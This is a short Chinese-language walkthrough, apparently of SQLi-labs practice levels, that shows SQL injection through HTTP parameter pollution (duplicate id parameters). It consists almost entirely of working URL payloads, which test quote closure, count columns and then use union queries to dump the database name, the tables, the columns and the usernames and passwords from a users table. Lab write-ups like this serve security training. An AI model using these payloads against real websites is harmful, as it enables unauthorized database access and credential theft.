这一关如果直接union查询注入,就是很底子的sql注入。实在这里考察的是http参数污染注入。
?id=2&id=1'报错——判定为单引号闭合
?id=2&id=1'--+正常回显——确定为单引号闭合
?id=2&id=1' order by 3--+——判定有三处回显
?id=2&id=' union select 1,2,3--+——判定出回显位置
?id=2&id=' union select 1,user(),database()--+——爆数据库和数据库用户:
?id=2&id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=2&id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=2&id=' union select 1,2,group_concat(id) from security.users--+—— 爆数据 less30(双引号http参数污染)
?id=a&id=1'正常回显
?id=a&id=1"无回显——判定为双引号闭合
?id=a&id=1"--+——正常回显,确定为双引号闭合
?id=a&id=1" order by 3--+——判定有三处回显位
?id=a&id=" union select 1,2,3--+——找到回显位置
?id=a&id=" union select 1,2,database()--+——爆数据库
?id=a&id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=a&id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=a&id=" union select 1,2,group_concat(username,password) from security.users--+——爆数据
?id=0&id=2") order by 3--+——判定有三处回显
?id=0&id=") union select 1,2,3--+——找到回显位置
?id=0&id=") union select 1,2,database()--+——爆数据库
?id=0&id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=0&id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=0&id=") union select 1,2,group_concat(id,password) from security.users--+——爆数据
